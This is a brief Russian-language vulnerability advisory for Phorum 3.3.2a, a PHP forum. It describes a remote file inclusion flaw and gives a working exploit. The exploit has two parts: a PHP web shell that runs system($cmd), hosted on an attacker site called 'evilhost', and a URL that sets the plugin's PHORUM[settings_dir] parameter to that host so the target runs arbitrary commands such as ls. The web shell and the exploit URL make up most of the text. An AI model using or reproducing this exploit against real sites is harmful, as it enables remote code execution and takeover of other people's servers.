Phorum - форум,
написанный на php. Недостаток защиты в программе позволяет удаленным пользователям
подключать внешние php сценарии и выполнять произвольный код и команды.
Пример:
Создаем файл replace.php на сайте evilhost:
<?
echo("<?
system(\"\$cmd\");
?>");
?>
Если PHP не поддерживается, то вносим:
<?
system("$cmd");
?>
Затем ссылка
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir] =http://[evilhost]&cmd=ls
выполнит команду Ls на уязвимом сайте.
Уязвимость обнаружена в Phorum version 3.3.2a.
